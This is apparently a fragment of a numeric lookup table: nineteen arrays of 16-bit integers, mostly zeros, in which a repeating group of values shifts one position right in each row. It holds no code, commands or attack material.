[33792, 16640, 43072, 50192, 35972, 25409, 49382, 52742, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 30208, 11648, 14176, 9944, 17991],
[4096, 33792, 16640, 30784, 35856, 62340, 31297, 11750, 19206, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 50432, 63808, 50256, 64404, 53189, 36374],
[16384, 4096, 33792, 16640, 18496, 21520, 23172, 37185, 39654, 51206, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 30208, 3456, 30560, 2264, 41078, 41937],
[0, 16384, 4096, 33792, 16640, 6208, 7184, 49540, 43073, 2022, 17670, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 15104, 18112, 2992, 30828, 44347, 28904],
[0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 10372, 48961, 29926, 49670, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 41984, 51456, 59968, 11408, 21668, 22411],
[0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 36740, 54849, 57830, 16134, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 33024, 34880, 61456, 50308, 7297, 20906],
[0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 63108, 60737, 20198, 48134, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 57856, 34944, 32288, 41096, 4834, 15349],
[0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 23940, 1089, 48102, 14598, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 5888, 7616, 51568, 13788, 791, 48348],
[0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 50308, 6977, 10470, 46598, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 27392, 62144, 3760, 63375],
[0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 11140, 12865, 38374, 13062, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 32000, 26432, 12240, 62068, 31357, 64254],
[0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 37508, 18753, 742, 45062, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 36352, 37760, 10464, 49464, 49038, 40153],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 63876, 24641, 28646, 11526, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 13056, 50368, 64304, 28748, 12339, 12432],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 24708, 30529, 56550, 43526, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 40704, 28608, 14832, 49404, 19027],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 51076, 36417, 18918, 9990, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 47360, 38464, 17296, 62820, 50617, 32274],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 11908, 42305, 46822, 41990, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 31232, 11904, 14240, 39656, 45690, 51837],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 38276, 48193, 9190, 8454, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 36608, 15296, 24816, 6076, 12431, 8196],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 64644, 54081, 37094, 40454, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 8704, 47232, 45600, 6024, 13271],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 25476, 59969, 64998, 6918, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 13568, 5440, 60240, 15700, 6709, 36582],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 51844, 321, 27366, 38918, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 42496, 22912, 27232, 23960, 14246, 35041],
